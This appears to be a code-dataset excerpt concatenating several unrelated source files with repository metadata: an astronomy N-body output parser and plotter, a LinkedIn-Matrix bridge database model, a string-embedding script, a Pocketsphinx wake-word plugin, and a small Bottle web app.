#data.plot(d1='var1', d2='var2'): data, str, str -> plot
#takes in the 2 coordinates of the data you want to plot and plots them in a 2d scatter plot
#sticks a big fat red dot wherever the specific star is, given an id
#data.hist(d='r'): data, str -> histogram plot
#takes in the coordinate of the data you want in your histogram and then produces the relevant plot
#read_output(f): filename -> data class
#reads a milky way at home output file and turns it into a data class
#subset(data): data_object -> data_object
#takes in a data object and outputs a cut data object. Can cut within some radius or a rectangle cut. Can specify the axes, or if there is only 1 axis.
| 44.518892 | 266 | 0.581928 | #purpose: to take output from a MW@h .out file and produce workable data/plots to look at the resulting output in meaningful ways
#this is still too hard-coded for my liking, but it'll have to do for now
#i.e. if you want to add new attributes to the data class then you manually have to go through and fix the appending functions
import matplotlib.pyplot as plt
import numpy as np
import coord_trans as ct
import astropy
from astropy.coordinates import SkyCoord
import astropy.units as u
import random
import galpy
from galpy.orbit import Orbit
from galpy.potential import HernquistPotential
from galpy.potential import LogarithmicHaloPotential
from galpy.potential import MiyamotoNagaiPotential
from galpy.potential import PlummerPotential
m_bulge = 3.4e10*u.solMass #solar masses
m_disk = 1.0e11*u.solMass
v_halo = 74.61*u.km/u.s #km/s
G = 6.67e-11*u.m**3/(u.kg*u.s**2)
pot_bulge = HernquistPotential(amp=2*m_bulge, a=0.7*u.kpc, ro=8., vo=220.)
pot_disk = MiyamotoNagaiPotential(amp=G*m_disk, a=6.5*u.kpc, b=0.26*u.kpc, ro=8., vo=220.)
pot_halo = LogarithmicHaloPotential(amp=2*v_halo**2, q=1., core=12.0*u.kpc, ro=8., vo=220.)
pot = [pot_bulge, pot_disk, pot_halo]
m_plummer = 1e9*u.solMass
r_scale_plummer = 3*u.kpc
plummer_pot = PlummerPotential(amp=G*m_plummer, b=r_scale_plummer, ro=10*u.kpc, vo=20*u.km/u.s)
struct_to_sol = 222288.47 #this many solar masses make up one structural nass unit (the output of mwah)
class Data():
def __init__(self, id_val=[], x=[], y=[], z=[], l=[], b=[], r=[], vx=[], vy=[], vz=[], mass=[], vlos=[], centerOfMass=[], centerOfMomentum=[], pot_offset=0):
#these should all be lists of floats
self.id = np.array(id_val)
self.x = np.array(x)
self.y = np.array(y)
self.z = np.array(z)
self.l = np.array(l)
self.b = np.array(b)
self.r = np.array(r)
self.vx = np.array(vx)
self.vy = np.array(vy)
self.vz = np.array(vz)
self.mass = np.array(mass)
self.vlos = np.array(vlos)
self.centerOfMass = centerOfMass
self.centerOfMomentum = centerOfMomentum
self.msol = self.mass * struct_to_sol
c = SkyCoord(l=self.l*u.degree, b=self.b*u.degree, frame='galactic')
c_trans = c.transform_to('icrs')
self.ra = c_trans.ra.degree
self.dec = c_trans.dec.degree
self.d = (self.x**2 + self.y**2 + self.z**2)**0.5 #TODO: correct d vs r
self.vgsr = self.vlos + 10.1*np.cos(self.b*np.pi/180)*np.cos(self.l*np.pi/180) + 224*np.cos(self.b*np.pi/180)*np.sin(self.l*np.pi/180) + 6.7*np.sin(self.b*np.pi/180)
self.rv, self.pmra, self.pmdec = ct.getrvpm(self.ra, self.dec, self.r, self.vx, self.vy, self.vz)
self.pmtot = (self.pmra**2 + self.pmdec**2)**0.5
#4.848e-6 is arcsec->rad, 3.086e16 is kpc->km, and 3.156e7 is sidereal yr -> seconds
self.vtan = 4.74*self.r*self.pmtot #self.r*np.tan(self.pmtot*4.848e-6) * 3.086e16 / 3.156e7
#get the angular momentum info
self.lx = self.y * self.vz - self.z * self.vy
self.ly = self.x * self.vz - self.z * self.vx
self.lz = self.x * self.vy - self.y * self.vx
self.lperp = (self.lx**2 + self.ly**2)**0.5
self.ltot = (self.lx**2 + self.ly**2 + self.lz**2)**0.5
#galactocentric velocity information
self.rad = (self.x*self.vx + self.y*self.vy + self.z*self.vz)/self.r
self.rot = self.lz/(self.x**2 + self.y**2)**0.5
#get the energy info
PE = galpy.potential.evaluatePotentials(pot, (self.x**2 + self.y**2)**0.5 * u.kpc, self.z*u.kpc, ro=8., vo=220.) - pot_offset
KE = 0.5*(self.vx**2 + self.vy**2 + self.vz**2)
self.energy = PE + KE
self.array_dict = {'id':self.id, 'x':self.x, 'y':self.y, 'z':self.z, 'l':self.l, 'b':self.b, 'r':self.r, 'vx':self.vx, \
'vy':self.vy, 'vz':self.vz, 'mass':self.mass, 'vtan':self.vtan, 'vlos':self.vlos, \
'msol':self.msol, 'ra':self.ra, 'dec':self.dec, 'd':self.d, 'vgsr':self.vgsr, \
'energy':self.energy, 'ltot':self.ltot, 'lz':self.lz, 'lperp':self.lperp, 'pmra':self.pmra, \
'pmdec':self.pmdec, 'rad':self.rad}
def cutFirstN(self, n):
self.id = self.id[n:]
self.x = self.x[n:]
self.y = self.y[n:]
self.z = self.z[n:]
self.l = self.l[n:]
self.b = self.b[n:]
self.r = self.r[n:]
self.vx = self.vx[n:]
self.vy = self.vy[n:]
self.vz = self.vz[n:]
self.mass = self.mass[n:]
self.vlos = self.vlos[n:]
self.msol = self.msol[n:]
self.ra = self.ra[n:]
self.dec = self.dec[n:]
self.d = self.d[n:]
self.vgsr = self.vgsr[n:]
self.vtan = self.vtan[n:]
self.lz = self.lz[n:]
self.lperp = self.lperp[n:]
self.energy = self.energy[n:]
self.pmra = self.pmra[n:]
self.pmdec = self.pmdec[n:]
self.rad = self.rad[n:]
self.updateArrayDict()
def cutLastN(self, n):
self.id = self.id[:len(self.rad) - n]
self.x = self.x[:len(self.rad) - n]
self.y = self.y[:len(self.rad) - n]
self.z = self.z[:len(self.rad) - n]
self.l = self.l[:len(self.rad) - n]
self.b = self.b[:len(self.rad) - n]
self.r = self.r[:len(self.rad) - n]
self.vx = self.vx[:len(self.rad) - n]
self.vy = self.vy[:len(self.rad) - n]
self.vz = self.vz[:len(self.rad) - n]
self.mass = self.mass[:len(self.rad) - n]
self.vlos = self.vlos[:len(self.rad) - n]
self.msol = self.msol[:len(self.rad) - n]
self.ra = self.ra[:len(self.rad) - n]
self.dec = self.dec[:len(self.rad) - n]
self.d = self.d[:len(self.rad) - n]
self.vgsr = self.vgsr[:len(self.rad) - n]
self.vtan = self.vtan[:len(self.rad) - n]
self.lz = self.lz[:len(self.rad) - n]
self.lperp = self.lperp[:len(self.rad) - n]
self.energy = self.energy[:len(self.rad) - n]
self.pmra = self.pmra[:len(self.rad) - n]
self.pmdec = self.pmdec[:len(self.rad) - n]
self.rad = self.rad[:len(self.rad) - n]
self.updateArrayDict()
def initial_energy(self):
self.x = self.x - self.centerOfMass[0]
self.y = self.y - self.centerOfMass[1]
self.z = self.z - self.centerOfMass[2]
self.vx = self.vx - self.centerOfMomentum[0]
self.vy = self.vy - self.centerOfMomentum[1]
self.vz = self.vz - self.centerOfMomentum[2]
self.r = (self.x**2 + self.y**2 + self.z**2)**0.5
PE = galpy.potential.evaluatePotentials(plummer_pot, (self.x**2 + self.y**2)**0.5 * u.kpc, self.z*u.kpc, ro=10., vo=20.)
KE = 0.5*(self.vx**2 + self.vy**2 + self.vz**2)
self.energy = PE + KE
#data.plot(d1='var1', d2='var2'): data, str, str -> plot
#takes in the 2 coordinates of the data you want to plot and plots them in a 2d scatter plot
def plot(self, d1='r', d2='z', overplot=False, s=5.0, color='k', marker='o', **kwargs):
#d1: the x-axis variable
#d2: the y-axis variable
#these can be x, y, z, vlos, l, b, etc. any attribute of the data class
array_dict = self.array_dict
x_array = array_dict[d1]
y_array = array_dict[d2]
plt.scatter(x_array, y_array, s=s, c=color, marker=marker, **kwargs)
#plt.xlim([-60000, 10000])
#plt.ylim([-1000, 1000])
if not overplot:
plt.xlabel(d1)
plt.ylabel(d2)
plt.show()
#sticks a big fat red dot wherever the specific star is, given an id
def trace_particle(self, id, d1='r', d2='z', overplot=False, s=50.0, color='r', marker='o', vel=False, **kwargs):
#right now, id is the index of the star in the data structure
#TODO: allow id matching to the id array in data structure as well
array_dict = self.array_dict
x_array = array_dict[d1][id]
y_array = array_dict[d2][id]
plt.scatter(x_array, y_array, s=s, c=color, marker=marker, **kwargs)
if vel:
vx = array_dict['vx'][id]
vy = array_dict['vz'][id]
#TODO: should alter to properly allow other velocities than what I'm hard coding
#TODO: allow to change scaling of arrow length
plt.arrow(x_array, y_array, vx/50, vy/50, color=color, head_width=1, **kwargs)
if not overplot:
plt.xlabel(d1)
plt.ylabel(d2)
plt.show()
#data.hist(d='r'): data, str -> histogram plot
#takes in the coordinate of the data you want in your histogram and then produces the relevant plot
def hist(self, d='r', overplot=False, hist_range=None, hist_bins=10, *args, **kwargs):
#d: the variable being binned
#again, can be any attribute of the data class
array_dict = self.array_dict
x_array = array_dict[d]
h = plt.hist(x_array, range=hist_range, bins=hist_bins, *args, **kwargs)
if not overplot:
plt.xlabel(d)
plt.show()
return h
def hist2d(self, d1='r', d2='lz', bins=10, range=None, density=False, weights=None, cmin=None, cmax=None, data=None, overplot=False, **kwargs):
array_dict = self.array_dict
x = array_dict[d1]
y = array_dict[d2]
h = plt.hist2d(x, y, bins=bins, range=range, weights=weights, cmin=cmin, cmax=cmax, data=data, **kwargs)
if not overplot:
plt.xlabel(d1)
plt.ylabel(d2)
plt.show()
return h
def makeCSVFile(self, f_name):
#f: the filename for the output csv file
array_dict = self.array_dict
array_order = []
f = open(f_name, 'w')
#make the header
header = ''
for key in array_dict:
header += (key + ',')
header += '\n'
f.write(header)
#iterate through the data and print each line
i = 0
while i < len(self.id):
line = ''
for key in array_dict:
line += (str(array_dict[key][i]) + ',')
line += '\n'
f.write(line)
i += 1
print('Data output to ' + f_name)
def updateArrayDict(self):
self.array_dict = {'id':self.id, 'x':self.x, 'y':self.y, 'z':self.z, 'l':self.l, 'b':self.b, 'r':self.r, 'vx':self.vx, \
'vy':self.vy, 'vz':self.vz, 'mass':self.mass, 'vtan':self.vtan, 'vlos':self.vlos, \
'msol':self.msol, 'ra':self.ra, 'dec':self.dec, 'd':self.d, 'vgsr':self.vgsr, \
'energy':self.energy, 'ltot':self.ltot, 'lz':self.lz, 'lperp':self.lperp, 'pmra':self.pmra, \
'pmdec':self.pmdec, 'rad':self.rad}
def append_data(self, append_data):
self.id = np.append(self.id, append_data.id)
self.x = np.append(self.x, append_data.x)
self.y = np.append(self.y, append_data.y)
self.z = np.append(self.z, append_data.z)
self.l = np.append(self.l, append_data.l)
self.b = np.append(self.b, append_data.b)
self.r = np.append(self.r, append_data.r)
self.vx = np.append(self.vx, append_data.vx)
self.vy = np.append(self.vy, append_data.vy)
self.vz = np.append(self.vz, append_data.vz)
self.mass = np.append(self.mass, append_data.mass)
self.vlos = np.append(self.vlos, append_data.vlos)
self.msol = np.append(self.msol, append_data.msol)
self.ra = np.append(self.ra, append_data.ra)
self.dec = np.append(self.dec, append_data.dec)
self.d = np.append(self.d, append_data.d)
self.vgsr = np.append(self.vgsr, append_data.vgsr)
self.vtan = np.append(self.vtan, append_data.vtan)
self.lz = np.append(self.lz, append_data.lz)
self.lperp = np.append(self.lperp, append_data.lperp)
self.energy = np.append(self.energy, append_data.energy)
self.pmra = np.append(self.pmra, append_data.pmra)
self.pmdec = np.append(self.pmdec, append_data.pmdec)
self.rad = np.append(self.rad, append_data.rad)
self.updateArrayDict()
def append_point(self, append_data, i):
self.id = np.append(self.id, append_data.id[i])
self.x = np.append(self.x, append_data.x[i])
self.y = np.append(self.y, append_data.y[i])
self.z = np.append(self.z, append_data.z[i])
self.l = np.append(self.l, append_data.l[i])
self.b = np.append(self.b, append_data.b[i])
self.r = np.append(self.r, append_data.r[i])
self.vx = np.append(self.vx, append_data.vx[i])
self.vy = np.append(self.vy, append_data.vy[i])
self.vz = np.append(self.vz, append_data.vz[i])
self.mass = np.append(self.mass, append_data.mass[i])
self.vlos = np.append(self.vlos, append_data.vlos[i])
self.msol = np.append(self.msol, append_data.msol[i])
self.ra = np.append(self.ra, append_data.ra[i])
self.dec = np.append(self.dec, append_data.dec[i])
self.d = np.append(self.d, append_data.d[i])
self.vgsr = np.append(self.vgsr, append_data.vgsr[i])
self.vtan = np.append(self.vtan, append_data.vtan[i])
self.lz = np.append(self.lz, append_data.lz[i])
self.lperp = np.append(self.lperp, append_data.lperp[i])
self.energy = np.append(self.energy, append_data.energy[i])
self.pmra = np.append(self.pmra, append_data.pmra[i])
self.pmdec = np.append(self.pmdec, append_data.pmdec[i])
self.rad = np.append(self.rad, append_data.rad[i])
self.updateArrayDict()
#read_output(f): filename -> data class
#reads a milky way at home output file and turns it into a data class
def readOutput(f, init_energy=False, subsample=1.0, pot_offset=0):
#f: the filename, formatted ('~/milkywayathome_client/nbody/...')
#subsample: the percentage [0.0, 1.0] of the sample to use
f = open(f)
#remove the header: this is info we don't need
comass = []
comom = []
if init_energy:
for i in range(0, 4):
f.readline()
#read in data for initial_energy work
line = f.readline()
line = line.split(',')
line[0] = line[0].strip('centerOfMass = ')
line[3] = line[3].strip('centerOfMomentum = ')
comass = [float(line[0]), float(line[1]), float(line[2])]
comom = [float(line[3]), float(line[4]), float(line[5])]
f.readline()
else:
for i in range(0, 5):
f.readline()
#store the data here temporarily
#indexed this way to avoid the 'ignore' column
array_dict = {1:[], 2:[], 3:[], 4:[], 5:[], 6:[], 7:[], 8:[], 9:[], 10:[], 11:[], 12:[]}
#place all the data from the file into the dictionary
for line in f:
m = random.random()
if m <= subsample:
line = line.strip().split(',')
i = 1
while i < len(line):
array_dict[i].append(float(line[i]))
i += 1
#return the data class using the array dictionary we built
return Data(array_dict[1], array_dict[2], array_dict[3], array_dict[4], array_dict[5], array_dict[6], array_dict[7], array_dict[8], array_dict[9], array_dict[10], array_dict[11], array_dict[12], centerOfMass=comass, centerOfMomentum=comom, pot_offset=pot_offset)
#subset(data): data_object -> data_object
#takes in a data object and outputs a cut data object. Can cut within some radius or a rectangle cut. Can specify the axes, or if there is only 1 axis.
def subset(data, ax1='ra', ax2=None, rect=False, radius=None, center=None, corner1=None, corner2=None):
#data: the data object being cut
#ax1: the x-axis for the subset procedure
#ax2: the y-axis for the procedure. If not specified, function assumes 1-dimensional cut on ax1
#rect: If True, use a rectangular cut (corner1 & corner2) instead of radius to cut
#radius: the radius for a radius cut
#center: the center of the radius cut tuple(x,y) if 2d or a number if 1d
#corner1: Bottom left corner for rectangular cut tuple(x, y)
#corner2: Top right corner for rectangular cut tuple(x, y)
array_dict = data.array_dict
data_out = Data()
if rect:
if (not ax2) or (not corner1) or (not corner2):
print('Must provide ax2, corner1 and corner2 for a rectangular cut')
return None
else: #do rectangular cut data_out.id = np.append(data_out.id, Data.id[i])
i = 0
while i < len(data.ra):
if corner1[0] < array_dict[ax1][i] < corner2[0] and corner1[1] < array_dict[ax2][i] < corner2[1]:
data_out.append_point(data, i)
i+=1
return data_out
else: #do radius cut
if (not radius) or center == None: #radius and/or center weren't provided
print('Must provide radius and center for a radial cut')
return None
else:
if ax2: #do 2d cut
i = 0
while i < len(data.ra):
if radius >= ((array_dict[ax1][i] - center[0])**2 + (array_dict[ax2][i] - center[1])**2)**0.5:
data_out.append_point(data, i)
i+=1
return data_out
else: #do 1d cut
i = 0
while i < len(data.ra):
if radius >= abs(array_dict[ax1][i] - center):
data_out.append_point(data, i)
i+=1
return data_out
| 15,171 | -8 | 388 |
a6a3304cd956f131231e010acad553cbf8c132ec | 4,969 | py | Python | linkedin_matrix/db/message.py | sumnerevans/mautrix-linkedin | 4d9b3feb8b6d7b7cba534cfaef93582814586958 | [
"Apache-2.0"
] | 9 | 2021-06-10T11:22:37.000Z | 2021-07-14T14:31:35.000Z | linkedin_matrix/db/message.py | sumnerevans/linkedin-matrix | 4d9b3feb8b6d7b7cba534cfaef93582814586958 | [
"Apache-2.0"
] | 55 | 2021-06-04T03:04:53.000Z | 2021-07-13T03:01:15.000Z | linkedin_matrix/db/message.py | sumnerevans/mautrix-linkedin | 4d9b3feb8b6d7b7cba534cfaef93582814586958 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from typing import cast, List, Optional
from asyncpg import Record
from attr import dataclass
from linkedin_messaging import URN
from mautrix.types import EventID, RoomID
from .model_base import Model
@dataclass
| 28.394286 | 86 | 0.559066 | from datetime import datetime
from typing import cast, List, Optional
from asyncpg import Record
from attr import dataclass
from linkedin_messaging import URN
from mautrix.types import EventID, RoomID
from .model_base import Model
@dataclass
class Message(Model):
mxid: EventID
mx_room: RoomID
li_message_urn: URN
li_thread_urn: URN
li_sender_urn: URN
li_receiver_urn: URN
index: int
timestamp: datetime
_table_name = "message"
_field_list = [
"mxid",
"mx_room",
"li_message_urn",
"li_thread_urn",
"li_sender_urn",
"li_receiver_urn",
"index",
"timestamp",
]
@classmethod
def _from_row(cls, row: Optional[Record]) -> Optional["Message"]:
if row is None:
return None
data = {**row}
li_message_urn = data.pop("li_message_urn")
li_thread_urn = data.pop("li_thread_urn")
li_sender_urn = data.pop("li_sender_urn")
li_receiver_urn = data.pop("li_receiver_urn")
timestamp = data.pop("timestamp")
return cls(
**data,
li_message_urn=URN(li_message_urn),
li_thread_urn=URN(li_thread_urn),
li_sender_urn=URN(li_sender_urn),
li_receiver_urn=URN(li_receiver_urn),
timestamp=datetime.fromtimestamp(timestamp)
)
@classmethod
async def get_all_by_li_thread_urn(
cls,
li_thread_urn: URN,
li_receiver_urn: URN,
) -> List["Message"]:
query = Message.select_constructor("li_thread_urn=$1 AND li_receiver_urn=$2")
rows = await cls.db.fetch(
query,
li_thread_urn.id_str(),
li_receiver_urn.id_str(),
)
return [cast(Message, cls._from_row(row)) for row in rows if row]
@classmethod
async def get_by_li_message_urn(
cls,
li_message_urn: URN,
li_receiver_urn: URN,
index: int = 0,
) -> Optional["Message"]:
query = Message.select_constructor(
"li_message_urn=$1 AND li_receiver_urn=$2 AND index=$3"
)
row = await cls.db.fetchrow(
query,
li_message_urn.id_str(),
li_receiver_urn.id_str(),
index,
)
return cls._from_row(row)
@classmethod
async def delete_all_by_room(cls, room_id: RoomID) -> None:
await cls.db.execute("DELETE FROM message WHERE mx_room=$1", room_id)
@classmethod
async def get_by_mxid(cls, mxid: EventID, mx_room: RoomID) -> Optional["Message"]:
query = Message.select_constructor("mxid=$1 AND mx_room=$2")
row = await cls.db.fetchrow(query, mxid, mx_room)
return cls._from_row(row)
@classmethod
async def get_most_recent(
cls,
li_thread_urn: URN,
li_receiver_urn: URN,
) -> Optional["Message"]:
query = (
Message.select_constructor("li_thread_urn=$1 AND li_receiver_urn=$2 ")
+ " ORDER BY timestamp DESC"
+ " LIMIT 1"
)
row = await cls.db.fetchrow(
query,
li_thread_urn.id_str(),
li_receiver_urn.id_str(),
)
return cls._from_row(row)
async def insert(self) -> None:
query = Message.insert_constructor()
await self.db.execute(
query,
self.mxid,
self.mx_room,
self.li_message_urn.id_str(),
self.li_thread_urn.id_str(),
self.li_sender_urn.id_str(),
self.li_receiver_urn.id_str(),
self.index,
self.timestamp.timestamp(),
)
@classmethod
async def bulk_create(
cls,
li_message_urn: URN,
li_thread_urn: URN,
li_sender_urn: URN,
li_receiver_urn: URN,
timestamp: datetime,
event_ids: List[EventID],
mx_room: RoomID,
) -> None:
if not event_ids:
return
records = [
(
mxid,
mx_room,
li_message_urn.id_str(),
li_thread_urn.id_str(),
li_sender_urn.id_str(),
li_receiver_urn.id_str(),
index,
timestamp.timestamp(),
)
for index, mxid in enumerate(event_ids)
]
async with cls.db.acquire() as conn, conn.transaction():
await conn.copy_records_to_table(
"message",
records=records,
columns=cls._field_list,
)
async def delete(self) -> None:
q = """
DELETE FROM message
WHERE li_message_urn=$1
AND li_receiver_urn=$2
AND index=$3"
"""
await self.db.execute(
q,
self.li_message_urn.id_str(),
self.li_receiver_urn.id_str(),
self.index,
)
| 3,936 | 765 | 22 |
e3ba67c416417347a7f1ba1c65b86a55a4f9dc51 | 180 | py | Python | settings/production.py | kittenswolf/aid-bot | a4ad50339e8bf147a09652273ca2c456289ddbe4 | [
"BSD-3-Clause"
] | 1 | 2020-12-19T00:56:28.000Z | 2020-12-19T00:56:28.000Z | settings/production.py | kittenswolf/aid-bot | a4ad50339e8bf147a09652273ca2c456289ddbe4 | [
"BSD-3-Clause"
] | null | null | null | settings/production.py | kittenswolf/aid-bot | a4ad50339e8bf147a09652273ca2c456289ddbe4 | [
"BSD-3-Clause"
] | 2 | 2020-06-29T18:12:09.000Z | 2021-04-11T19:47:40.000Z | # -*- coding: utf-8 -*-
import logging
logging_level = logging.DEBUG
| 11.25 | 29 | 0.55 | # -*- coding: utf-8 -*-
import logging
logging_level = logging.DEBUG
class bot:
command_prefix = "p!"
startup_cogs = [
"cogs.play",
"cogs.logs"
]
| 0 | 84 | 23 |
a1d4aef2d598e8e62048c518c515aa6fcc334d74 | 2,276 | py | Python | embed_cgk.py | LFhase/string-embed | da8eb60186fcd26a94734f265f79fa5fc5096f76 | [
"MIT"
] | 1 | 2021-01-11T18:44:16.000Z | 2021-01-11T18:44:16.000Z | embed_cgk.py | LFhase/string-embed | da8eb60186fcd26a94734f265f79fa5fc5096f76 | [
"MIT"
] | null | null | null | embed_cgk.py | LFhase/string-embed | da8eb60186fcd26a94734f265f79fa5fc5096f76 | [
"MIT"
] | null | null | null | import math
import time
import numpy as np
from tqdm import tqdm
from multiprocessing import Pool, cpu_count
| 27.756098 | 81 | 0.579086 | import math
import time
import numpy as np
from tqdm import tqdm
from multiprocessing import Pool, cpu_count
def _cgk(parameters):
x, (h, M) = parameters
i = 0
j = 0
out = np.empty(3 * M, np.int)
while j < 3 * M and i < len(x):
out[j] = x[i]
i += h[j][x[i]]
j += 1
return out
def cgk_string(h, strings, M):
with Pool(cpu_count()) as pool:
start_time = time.time()
jobs = pool.imap(_cgk, zip(strings, [(h, M) for _ in strings]))
cgk_list = list(tqdm(jobs, total=len(strings), desc="# CGK embedding"))
print("# CGK embedding time: {}".format(time.time() - start_time))
return np.array(cgk_list)
def random_seed(maxl, sig):
return np.random.randint(low=0, high=2, size=(3 * maxl, sig))
def intersect(gs, ids):
rc = np.mean([len(np.intersect1d(g, list(id))) for g, id in zip(gs, ids)])
return rc
def ranking_recalls(sort, gt):
ks = [1, 5, 10, 20, 50, 100, 1000]
Ts = [2 ** i for i in range(2 + int(math.log2(len(sort[0]))))]
print("# Probed \t Items \t", end="")
for top_k in ks:
print("top-%d\t" % (top_k), end="")
print()
for t in Ts:
print("%6d \t %6d \t" % (t, len(sort[0, :t])), end="")
for top_k in ks:
rc = intersect(gt[:, :top_k], sort[:, :t])
print("%.4f \t" % (rc / float(top_k)), end="")
print()
def hamming_distance(args):
a, b = args
return np.count_nonzero(a != b, axis=1)
def distance(xq, xb):
def _distance(xq, xb):
start_time = time.time()
jobs = Pool().imap(hamming_distance, zip(xq, [xb for _ in xq]))
dist = list(tqdm(jobs, total=len(xq), desc="# hamming counting"))
print("# CGK hamming distance time: {}".format(time.time() - start_time))
return np.array(dist).reshape((len(xq), len(xb)))
if len(xq) < len(xb):
return _distance(xb, xq).T
else:
return _distance(xq, xb)
def cgk_embedding(args, datahandler):
h = random_seed(datahandler.M, datahandler.C)
xq = cgk_string(h, datahandler.xq.sig, datahandler.M)
xb = cgk_string(h, datahandler.xb.sig, datahandler.M)
dist = distance(xq, xb)
sort = np.argsort(dist)
ranking_recalls(sort, datahandler.query_knn)
| 1,974 | 0 | 184 |
baf797276a92fbd305a3c4fc7c578f4180394cd1 | 3,492 | py | Python | mycroft/interfaces/speech/wake_word_engines/pocketsphinx_engine.py | MatthewScholefield/mycroft-light | 95092ad3344ac95859952e94e280eb177e5c1c83 | [
"Apache-2.0"
] | 4 | 2018-03-30T01:27:04.000Z | 2018-11-23T10:06:34.000Z | mycroft/interfaces/speech/wake_word_engines/pocketsphinx_engine.py | MatthewScholefield/mycroft-light | 95092ad3344ac95859952e94e280eb177e5c1c83 | [
"Apache-2.0"
] | 3 | 2017-06-23T20:30:57.000Z | 2017-09-12T18:00:09.000Z | mycroft/interfaces/speech/wake_word_engines/pocketsphinx_engine.py | MatthewScholefield/mycroft-light | 95092ad3344ac95859952e94e280eb177e5c1c83 | [
"Apache-2.0"
] | 1 | 2017-06-27T18:35:37.000Z | 2017-06-27T18:35:37.000Z | # Copyright (c) 2019 Mycroft AI, Inc. and Matthew Scholefield
#
# This file is part of Mycroft Light
# (see https://github.com/MatthewScholefield/mycroft-light).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import tempfile
from os.path import join
from pocketsphinx import Decoder
from typing import Callable
from mycroft.interfaces.speech.wake_word_engines.wake_word_engine_plugin import WakeWordEnginePlugin
from mycroft.util.misc import download_extract_tar
| 36.757895 | 100 | 0.687572 | # Copyright (c) 2019 Mycroft AI, Inc. and Matthew Scholefield
#
# This file is part of Mycroft Light
# (see https://github.com/MatthewScholefield/mycroft-light).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import tempfile
from os.path import join
from pocketsphinx import Decoder
from typing import Callable
from mycroft.interfaces.speech.wake_word_engines.wake_word_engine_plugin import WakeWordEnginePlugin
from mycroft.util.misc import download_extract_tar
class PocketsphinxEngine(WakeWordEnginePlugin):
# Padding of silence when feeding to pocketsphinx
_config = {
'phonemes': 'HH EY . M AY K R AO F T',
'threshold': '1e-90',
'wake_word_length': 1.2
}
SILENCE_SEC = 0.01
url = 'https://github.com/MatthewScholefield/pocketsphinx-models/raw/master/{lang}.tar.gz'
def __init__(self, rt, on_activation: Callable):
super().__init__(rt, on_activation)
lang = rt.config['lang']
self.hmm_folder = join(rt.paths.user_config, 'models', lang)
self.rate, self.width = self.rec_config['sample_rate'], self.rec_config['sample_width']
self.padding = b'\0' * int(self.rate * self.width * self.SILENCE_SEC)
self.buffer = b''
download_extract_tar(self.url.format(lang=lang), self.hmm_folder)
config = Decoder.default_config()
config.set_string('-hmm', self.hmm_folder)
config.set_string('-dict', self._create_dict(self.wake_word, self.config['phonemes']))
config.set_string('-keyphrase', self.wake_word)
config.set_float('-kws_threshold', float(self.config['threshold']))
config.set_float('-samprate', self.rate)
config.set_int('-nfft', 2048)
config.set_string('-logfn', '/dev/null')
self.ps = Decoder(config)
@staticmethod
def _create_dict(key_phrase, phonemes):
fd, file_name = tempfile.mkstemp()
with os.fdopen(fd, 'w') as f:
f.write(key_phrase + ' ' + phonemes.replace(' . ', ' '))
return file_name
def _transcribe(self, raw_audio):
self.ps.start_utt()
self.ps.process_raw(raw_audio, False, False)
self.ps.end_utt()
return self.ps.hyp()
def startup(self):
self.buffer = b'\0' * int(self.width * self.rate * self.config['wake_word_length'])
def shutdown(self):
self.buffer = b''
def pause_listening(self):
pass
def continue_listening(self):
pass
def update(self, raw_audio: bytes):
self.buffer = self.buffer[len(raw_audio):] + raw_audio
transcription = self._transcribe(self.buffer + self.padding)
if transcription and self.wake_word in transcription.hypstr.lower():
self.on_activation()
| 1,689 | 564 | 23 |
c6be566db161d80cfe06c759c8d713915e91c3f5 | 2,680 | py | Python | app/home/__init__.py | andres-hurtado-lopez/lramprodvent | 257533d4ec07dc9783bd706d6af7ec0ec22fd9c0 | [
"MIT"
] | null | null | null | app/home/__init__.py | andres-hurtado-lopez/lramprodvent | 257533d4ec07dc9783bd706d6af7ec0ec22fd9c0 | [
"MIT"
] | null | null | null | app/home/__init__.py | andres-hurtado-lopez/lramprodvent | 257533d4ec07dc9783bd706d6af7ec0ec22fd9c0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import template, redirect
import utils
| 36.712329 | 187 | 0.666045 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import template, redirect
import utils
def GET(**params):
return template('home_index.html')
def ejemplos_bootstrap_grid_GET(**params):
return template("ejemplos_bootstrap_grid.html")
def ejemplos_bootstrap_fixed_GET(**params):
return template("ejemplos_bootstrap_fixed.html")
def ejemplos_bootstrap_fluid_GET(**params):
return template("ejemplos_bootstrap_fluid.html")
def ejemplos_bootstrap_responsive_GET(**params):
return template("ejemplos_bootstrap_responsive.html")
def tabla_ejemplo_GET(**params):
filter = '%'+params.get('filter','')+'%'
table = utils.RenderTable(\
'SELECT user, full_name FROM users WHERE user like %s ORDER BY user',\
(filter,),\
'<tr><td>Usuario</td><td>Nombre</td><td>Eliminar</td</tr>',\
'<tr><td><a href="/web/menu_principal/formulario_ejemplo?user={user}">{user}</td><td>{full_name}</td><td><a href="#" onclick="delete_record(\'{user}\');">Eliminar</a></td></tr>',\
'table table-bordered',\
5,\
int(params.get('table_usuarios_page','1'))\
)
return template('tabla_ejemplo.html', title='Listado Tablas', table=table)
def formulario_ejemplo_GET(**params):
db = utils.ConnectDB()
user = params.get('user')
new = params.get('new')
if user:
db.execute('SELECT user, full_name FROM users WHERE user = %s',(user,))
rowdata = db.fetchone()
return template("formulario_ejemplo.html", title='Formulario', userdata=rowdata, create='false')
elif new == 'true':
return template("formulario_ejemplo.html", title='Formulario', userdata={'user':'','full_name':''}, create='true')
